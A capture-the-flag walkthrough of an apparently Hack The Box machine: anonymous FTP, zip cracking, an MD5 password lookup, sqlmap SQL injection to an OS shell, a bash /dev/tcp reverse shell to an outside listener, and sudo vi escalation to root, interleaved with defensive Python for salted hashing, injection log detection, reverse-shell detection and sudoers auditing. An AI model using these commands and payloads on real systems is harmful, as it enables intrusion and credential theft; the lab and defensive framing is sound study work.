# Task 1
Q: Besides SSH and HTTP, what other service is hosted on this box?
Scan the target directly with nmap:
```text
┌──(root💀kali)-[~/桌面]
└─# nmap -sV -Pn 10.129.75.167
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 10:01 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.129.75.167
Host is up (0.70s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.77 seconds
```
The repeated `RTTVAR has grown to over 2.3 seconds, decreasing to 2.0` lines are a warning caused by my poor network connection: the variance of the round-trip time to the target is large.
A: ftp
# Task 2
Q: This service can be configured to allow login with any password for a specific username. What is that username?
A: anonymous
# Task 3
Q: What is the name of the file downloaded over this service?
Connect to the FTP service:
```text
┌──(root💀kali)-[~/桌面]
└─# ftp 10.129.75.167
Connected to 10.129.75.167.
220 (vsFTPd 3.0.3)
Name (10.129.75.167:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.27 secs (9.2379 kB/s)
```
The listing contains a single file, backup.zip, which we download.
A: backup.zip
# Task 4
Q: What script comes with the John the Ripper toolset and generates a hash from a password-protected zip archive in a format that allows for cracking attempts?
John the Ripper is a tool for cracking many kinds of password hashes.
First use zip2john to turn the archive into a hash, then run john against that hash:
```text
┌──(root💀kali)-[~/桌面]
└─# zip2john backup.zip > hash
ver 2.0 efh 5455 efh 7875 backup.zip/index.php PKZIP Encr: TS_chk, cmplen=1201, decmplen=2594, crc=3A41AE06 ts=5722 cs=5722 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/style.css PKZIP Encr: TS_chk, cmplen=986, decmplen=3274, crc=1B1CCD6A ts=989A cs=989a type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.

┌──(root💀kali)-[~/桌面]
└─# john hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
741852963        (backup.zip)
1g 0:00:00:00 DONE 2/3 (2022-05-08 10:12) 6.250g/s 531356p/s 531356c/s 531356C/s 123456..faithfaith
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Password: 741852963
A: 741852963
# Task 5
Q: What is the password for the admin user on the website?
Extract the archive:
```text
┌──(root💀kali)-[~/桌面]
└─# unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password:
  inflating: index.php
  inflating: style.css
```
Looking at index.php, we can see the password hash 2cb42f8734ea607eefed3b70af13bbd3 hard-coded in the login check:
```php
<!DOCTYPE html>
<?php
session_start();
if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
        $_SESSION['login'] = "true";
        header("Location: dashboard.php");
    }
}
?>
```
Looking the MD5 up in an online hash database gives the result: qwerty789
A: qwerty789
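The index.php above compares an unsalted MD5 of the submitted password against a constant, which is why a plain online lookup recovers it: the same password always yields the same digest, so a precomputed table maps digests straight back to passwords. The following Python is an added example, not code from the box or from this walkthrough. It shows that determinism on a constructed wordlist and, beside it, the hardened form a defender would use instead: a random per-user salt and a slow key-derivation function (`hashlib.pbkdf2_hmac`), verified with a constant-time compare. The wordlist, the iteration count and the storage format are assumptions for the demonstration.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional

# Constructed "lookup table" of the kind an online MD5 database holds
# (digest -> cleartext), built from a handful of weak passwords.
WEAK_PASSWORDS = ["123456", "password", "qwerty", "letmein"]

def md5_hex(password: str) -> str:
    """Unsalted MD5, the check used by the vulnerable index.php."""
    return hashlib.md5(password.encode()).hexdigest()

def build_lookup_table(passwords) -> Dict[str, str]:
    return {md5_hex(p): p for p in passwords}

def lookup_md5(digest: str, table: Dict[str, str]) -> Optional[str]:
    """Reverse an unsalted digest by table lookup; None if it is not in the table."""
    return table.get(digest.lower())

# Hardened form: random per-user salt plus a slow KDF, stored as one string.
PBKDF2_ITERATIONS = 600_000   # assumption: tune so one hash costs ~100 ms on the server

def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<derived key hex>'."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recompute the derived key from the stored salt and compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    # constant-time compare so the check does not leak how many bytes matched
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    table = build_lookup_table(WEAK_PASSWORDS)
    print("md5 lookup of md5('qwerty'):", lookup_md5(md5_hex("qwerty"), table))
    s1, s2 = hash_password("qwerty"), hash_password("qwerty")
    print("same password, different stored values:", s1 != s2)
    print("verify correct / wrong:", verify_password("qwerty", s1), verify_password("wrong", s1))
```

With the salted form, two users with the same password store different values and no precomputed table applies; the slow KDF also makes guessing from a leaked record expensive instead of instant.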
# Task 6
Q: What option can be passed to sqlmap to try to get command execution via the SQL injection?
Logging in with the credentials above, the dashboard turns out to be a search form; manual testing shows the search parameter is injectable:
```text
http://10.129.75.167/dashboard.php?search=%27AND%201=1%20--
http://10.129.75.167/dashboard.php?search=%27AND%202=1%20--
```
Just run sqlmap against it.
Because the dashboard requires the admin login, the session cookie must be passed to sqlmap when running it.
Mine was: `PHPSESSID=462ehhjmskjo99v8ld1m3d470b`
![image.png](./Vaccine.assert/1651977532500-8f192941-bb99-4697-b393-3369c6e46bf2.png)
Getting a shell:
```text
┌──(root💀kali)-[~/桌面]
└─# sqlmap -u 10.129.75.167/dashboard.php?search=1 --cookie=PHPSESSID=462ehhjmskjo99v8ld1m3d470b --risk=3 --level=3 --random-agent --os-shell
___
__H__
___ ___[.]_____ ___ ___ {1.5.11#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:40:20 /2022-05-08/
[10:40:20] [INFO] fetched random HTTP User-Agent header value 'Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
[10:40:20] [INFO] testing connection to the target URL
[10:40:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:40:22] [INFO] testing if the target URL content is stable
[10:40:23] [INFO] target URL content is stable
[10:40:23] [INFO] testing if GET parameter 'search' is dynamic
[10:40:24] [WARNING] GET parameter 'search' does not appear to be dynamic
[10:40:25] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[10:40:26] [INFO] heuristic (XSS) test shows that GET parameter 'search' might be vulnerable to cross-site scripting (XSS) attacks
[10:40:26] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (3) value? [Y/n] n
[10:40:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:41:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[10:41:38] [INFO] GET parameter 'search' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="SUV")
[10:41:38] [INFO] testing 'Generic inline queries'
[10:41:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[10:41:40] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[10:41:40] [INFO] testing 'PostgreSQL inline queries'
[10:41:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[10:41:53] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
[10:41:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[10:42:05] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[10:42:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:42:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:42:06] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:42:07] [WARNING] reflective value(s) found and filtering out
[10:42:12] [INFO] target URL appears to have 5 columns in query
[10:42:15] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[10:42:15] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: search (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: search=-7712' OR 5759=5759-- iRnE
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: search=1' AND 8843=CAST((CHR(113)||CHR(98)||CHR(118)||CHR(107)||CHR(113))||(SELECT (CASE WHEN (8843=8843) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(113)||CHR(112)||CHR(113)) AS NUMERIC)-- XdGz
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=1';SELECT PG_SLEEP(5)--
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: search=1' AND 1588=(SELECT 1588 FROM PG_SLEEP(5))-- kJxc
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,NULL,(CHR(113)||CHR(98)||CHR(118)||CHR(107)||CHR(113))||(CHR(102)||CHR(75)||CHR(100)||CHR(90)||CHR(89)||CHR(117)||CHR(66)||CHR(81)||CHR(97)||CHR(84)||CHR(101)||CHR(102)||CHR(110)||CHR(108)||CHR(122)||CHR(81)||CHR(102)||CHR(108)||CHR(106)||CHR(108)||CHR(65)||CHR(86)||CHR(77)||CHR(86)||CHR(71)||CHR(72)||CHR(105)||CHR(72)||CHR(99)||CHR(100)||CHR(101)||CHR(107)||CHR(88)||CHR(79)||CHR(114)||CHR(66)||CHR(81)||CHR(75)||CHR(74)||CHR(114))||(CHR(113)||CHR(120)||CHR(113)||CHR(112)||CHR(113))-- GBDO
---
[10:42:58] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[10:43:07] [INFO] fingerprinting the back-end DBMS operating system
[10:43:11] [INFO] the back-end DBMS operating system is Linux
[10:43:13] [INFO] testing if current user is DBA
[10:43:17] [INFO] going to use 'COPY ... FROM PROGRAM ...' command execution
[10:43:17] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
```
A: --os-shell
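The sqlmap log above records the payload shapes sent to the `search` parameter: a quote followed by a `--` comment, an `OR n=n` tautology, a stacked `;SELECT PG_SLEEP(5)`, a `UNION ALL SELECT`, and strings assembled with `CHR(..)||`. A defender can find that same run in the web server's access log. The following Python is an added example, not code from the box or from this walkthrough: it parses Apache combined-format lines, URL-decodes the query string and flags those indicators, then counts flagged requests per client. The log lines are constructed to mirror the payloads above. Because the run used `--random-agent`, the User-Agent is deliberately not used as a signal.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs, unquote_plus

# Constructed sample lines in Apache "combined" format (not real logs from the box);
# the query strings mirror the payload shapes sqlmap reported above.
SAMPLE_LOG = """\
10.10.16.86 - - [08/May/2022:10:40:20 +0000] "GET /dashboard.php?search=SUV HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.16.86 - - [08/May/2022:10:40:41 +0000] "GET /dashboard.php?search=-7712%27%20OR%205759%3D5759--%20iRnE HTTP/1.1" 200 5123 "-" "Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00"
10.10.16.86 - - [08/May/2022:10:41:41 +0000] "GET /dashboard.php?search=1%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 5123 "-" "Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00"
10.10.16.86 - - [08/May/2022:10:42:15 +0000] "GET /dashboard.php?search=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2C%28CHR%28113%29%7C%7CCHR%2898%29%29--%20GBDO HTTP/1.1" 200 5123 "-" "Opera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00"
10.10.14.3 - - [08/May/2022:10:43:00 +0000] "GET /dashboard.php?search=Audi%20A3 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

# client - ident - user [timestamp] "METHOD target protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Indicator patterns, matched against the decoded parameter value.
INDICATORS = [
    ("comment-terminated quote", re.compile(r"'.*--", re.S)),
    ("tautology", re.compile(r"\bOR\b\s+(\d+)\s*=\s*\1\b", re.I)),
    ("stacked query", re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|COPY)\b", re.I)),
    ("time-based probe", re.compile(r"\bPG_SLEEP\s*\(", re.I)),
    ("union select", re.compile(r"\bUNION\b(\s+ALL)?\s+SELECT\b", re.I)),
    ("CHR() string building", re.compile(r"\bCHR\s*\(\s*\d+\s*\)\s*\|\|", re.I)),
]

def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["target"])
    rec["path"] = url.path
    # parse_qs percent-decodes once; keep_blank_values keeps "search=" visible
    rec["params"] = {k: v[0] for k, v in parse_qs(url.query, keep_blank_values=True).items()}
    return rec

def classify_params(params):
    """Return (parameter, indicator) pairs for every indicator found in any parameter."""
    hits = []
    for name, value in params.items():
        decoded = unquote_plus(value)   # second decode catches double-encoded payloads
        for label, rx in INDICATORS:
            if rx.search(decoded):
                hits.append((name, label))
    return hits

def scan_log(text):
    """Return per-line findings and a per-client count of flagged requests."""
    findings, per_client = [], Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify_params(rec["params"])
        if hits:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "path": rec["path"], "hits": hits})
            per_client[rec["ip"]] += 1
    return findings, per_client

if __name__ == "__main__":
    findings, per_client = scan_log(SAMPLE_LOG)
    for f in findings:
        print(f["ts"], f["ip"], f["path"], f["hits"])
    print("flagged requests per client:", dict(per_client))
```

The per-client counter is the more robust signal in practice: sqlmap needed 82 requests against one parameter in about three minutes here, and that burst stands out even when an individual payload slips past the pattern list.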
# Task 7
Q: What program can the postgres user run as root using sudo?
The process is shown in the root flag section below.
A:vi
# Flag
After obtaining the os-shell above, start an nc listener:
```text
┌──(root💀kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
```
Then send a reverse shell back from os-shell:
```text
os-shell> bash -c "bash -i >& /dev/tcp/10.10.16.86/4444 0>&1"
```
`bash -c` means run the following string as a command with bash; the argument after `-c` is the command to execute.
`bash -i` starts an interactive shell.
`>` is something we see all the time, for example `echo "hello world" > hello.txt`, which writes the string into a file.
So what does `&>` (written `>&` in the command above) mean? First, the three standard file descriptors in a shell:
- 0 is the file descriptor for standard input (stdin), the characters we type into the shell.
- 1 is the file descriptor for standard output (stdout), the characters the system prints in the shell.
- 2 is the file descriptor for standard error (stderr), the error messages printed in the shell.
The `&` in front of `>` stands for file descriptors 1 and 2 together, i.e. standard output and standard error; here both the normal output and the error output of the interactive bash are written to /dev/tcp/10.10.16.86/4444.
/dev/tcp here is a special device path, not a real text file: writing to it opens a TCP connection, in this case to port 4444 on 10.10.16.86.
`0>&1` redirects bash's standard input (fd 0) to file descriptor 1 (stdout). The `&` here means something different from before: `&1` as a whole denotes file descriptor 1. Since `>&` has already sent fd 1 to /dev/tcp, fd 0 now follows fd 1 into /dev/tcp as well. All of the interactive bash's input and output therefore flows through the connection to the local listener, which gives us a shell.
The nc listener receives the connection.
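The redirection explained above leaves a tell-tale shape on the host: a shell process whose file descriptors 0, 1 and 2 all point at the same socket instead of a terminal or a pipe, which is visible under /proc/<pid>/fd. The following Python is an added example, not code from the box or from this walkthrough, that a defender could run on a Linux host to spot that shape. The classification works on a mapping of fd number to readlink target so it can be checked against the constructed snapshot below; the live collector walks /proc and needs permission to read other users' fd links. The shell name list and the sample processes are assumptions for the demonstration.

```python
import os
from pathlib import Path

# Command names treated as shells. Constructed, deliberately short list.
SHELLS = {"bash", "sh", "dash", "zsh", "ash"}

def classify_process(comm, fd_targets):
    """fd_targets maps fd number -> readlink() target of /proc/<pid>/fd/<n>.
    Returns a finding if the process is a shell with stdin/stdout/stderr on a socket
    (the shape that 'bash -i >& /dev/tcp/... 0>&1' produces), otherwise None."""
    if comm not in SHELLS:
        return None
    stdio = {n: fd_targets.get(n, "") for n in (0, 1, 2)}
    socket_fds = [n for n, target in stdio.items() if target.startswith("socket:")]
    if not socket_fds:
        return None
    # all three stdio descriptors on one and the same socket is the classic reverse shell
    all_same = len(socket_fds) == 3 and len({stdio[n] for n in socket_fds}) == 1
    return {"comm": comm, "socket_fds": socket_fds, "all_stdio_same_socket": all_same}

def collect_live_processes():
    """Yield (pid, comm, fd_targets) for every process readable under /proc (Linux only)."""
    for entry in Path("/proc").iterdir():
        if not entry.name.isdigit():
            continue
        try:
            comm = (entry / "comm").read_text().strip()
            fd_targets = {}
            for fd in (entry / "fd").iterdir():
                try:
                    fd_targets[int(fd.name)] = os.readlink(fd)
                except OSError:
                    pass   # descriptor closed between listing and readlink
        except OSError:
            continue       # process exited or its fd table is not readable by us
        yield int(entry.name), comm, fd_targets

def find_socket_bound_shells(processes):
    """processes: iterable of (pid, comm, fd_targets). Returns [(pid, finding), ...]."""
    results = []
    for pid, comm, fds in processes:
        finding = classify_process(comm, fds)
        if finding:
            results.append((pid, finding))
    return results

# Constructed snapshot (not taken from the box) of fd tables a defender might see:
# an interactive bash bound to a socket, a normal bash on a tty, a database process
# that legitimately holds sockets, and a script shell wired to pipes.
SAMPLE_PROCESSES = [
    (4242, "bash", {0: "socket:[31337]", 1: "socket:[31337]", 2: "socket:[31337]"}),
    (1200, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    (900, "postgres", {0: "/dev/null", 1: "/dev/null", 2: "socket:[555]", 7: "socket:[556]"}),
    (901, "sh", {0: "/dev/null", 1: "pipe:[777]", 2: "pipe:[777]"}),
]

if __name__ == "__main__":
    print("sample snapshot:", find_socket_bound_shells(SAMPLE_PROCESSES))
    if Path("/proc").is_dir():
        print("live host:", find_socket_bound_shells(collect_live_processes()))
```

Only the shell itself is flagged, not the postgres backend that holds sockets for legitimate reasons, because the check is on a shell binary having its standard streams on a socket rather than on socket ownership in general.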
# user flag
```text
postgres@vaccine:/var/lib/postgresql/11/main$ cd ~
cd ~
postgres@vaccine:/var/lib/postgresql$ ls
ls
11
user.txt
postgres@vaccine:/var/lib/postgresql$ cat user.txt
cat user.txt
ec9b13ca4d6229cd5cc1e09980965bf7
```
FLAG: `ec9b13ca4d6229cd5cc1e09980965bf7`
# root flag
Have a look around the web root:
```text
postgres@vaccine:/var/lib/postgresql/11/main$ cd /var/www/html
cd /var/www/html
postgres@vaccine:/var/www/html$ ls
ls
bg.png
dashboard.css
dashboard.js
dashboard.php
index.php
license.txt
style.css
postgres@vaccine:/var/www/html$ cat dashboard.php
cat dashboard.php
```
This gives us the database credentials:
```php
<?php
session_start();
if($_SESSION['login'] !== "true") {
    header("Location: index.php");
    die();
}
try {
    $conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");
}
```
Try logging in over SSH with that password; it will not necessarily work:
```text
┌──(root💀kali)-[~/桌面]
└─# ssh postgres@10.129.75.167
The authenticity of host '10.129.75.167 (10.129.75.167)' can't be established.
ED25519 key fingerprint is SHA256:4qLpMBLGtEbuHObR8YU15AGlIlpd0dsdiGh/pkeZYFo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.75.167' (ED25519) to the list of known hosts.
postgres@10.129.75.167's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-64-generic x86_64)
```
We're in. Now let's find a way to escalate to root.
Check which privileged commands this user is allowed to run:
```text
postgres@vaccine:~$ sudo -l
Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET",
    env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH",
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    mail_badpass

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
```
We can open the file /etc/postgresql/11/main/pg_hba.conf with vi as root.
Since vi can execute shell commands directly, open the file with vi and escalate from there:
```text
postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# inside vi, run the command: :!/bin/bash
root@vaccine:/var/lib/postgresql#
```
Then go and find the flag:
```text
root@vaccine:/var/lib/postgresql# cd ~
root@vaccine:~# ls
pg_hba.conf  root.txt  snap
root@vaccine:~# cat root.txt
dd6e058e814260bc70e9bbdef2715849
```
flag: `dd6e058e814260bc70e9bbdef2715849`
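The `sudo -l` rule in the root flag section is the kind of entry a defender should catch in a sudoers audit before anyone else does: vi can run shell commands, so `(ALL) /bin/vi <file>` is effectively `(ALL) /bin/bash`. The Python below is an added example, not part of this walkthrough or of the box: it parses `sudo -l` output into rules and flags commands known to offer a shell escape, suggesting `sudoedit` where the intent was only to edit a file. The sample text is a constructed copy of the rule above plus a second, made-up `systemctl` rule, and the escape-binary list is a short illustrative one, not a complete catalogue.

```python
import re
import shlex

# Short, illustrative set of binaries that reach a shell when run under sudo
# (vi is the one on this box). Constructed for the demo, not a complete list.
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "nano", "less", "more", "man", "find", "awk", "perl", "python3"}
EDITORS = {"vi", "vim", "view", "nano"}

# Constructed copy of the `sudo -l` output shown above plus one made-up rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for postgres on vaccine:
    env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET",
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,
    mail_badpass

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
    (ALL) NOPASSWD: /usr/bin/systemctl restart postgresql
"""

# one command rule: "(runas) [TAG: ...] command args"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")

def parse_sudo_l(text):
    """Return the command rules from `sudo -l` output as dicts with runas, tags and argv."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True        # everything after this header is a rule line
            continue
        if not in_rules:
            continue               # skip the Defaults block
        m = RULE_RE.match(line)
        if m:
            tags = [t.strip(": ") for t in m.group("tags").split(":") if t.strip(": ")]
            rules.append({"runas": m.group("runas").strip(), "tags": tags,
                          "argv": shlex.split(m.group("cmd"))})
    return rules

def audit_rules(rules):
    """Flag rules whose command can drop the caller into a shell as the runas user."""
    findings = []
    for rule in rules:
        binary = rule["argv"][0].rsplit("/", 1)[-1]
        if binary not in SHELL_ESCAPE_BINARIES:
            continue
        if binary in EDITORS:
            fix = "grant 'sudoedit <file>' instead, which edits a copy and never runs the editor as root"
        else:
            fix = "remove the rule or wrap the needed action in a fixed, argument-free script"
        findings.append({
            "rule": " ".join(rule["argv"]),
            "runas": rule["runas"],
            "reason": f"{binary} can spawn a shell, so this rule grants a full shell as {rule['runas']}",
            "fix": fix,
        })
    return findings

if __name__ == "__main__":
    for f in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{f['rule']}: {f['reason']}; fix: {f['fix']}")
```

On a real host the input would be the output of `sudo -l -U <user>` collected for each account, compared against a known-good baseline.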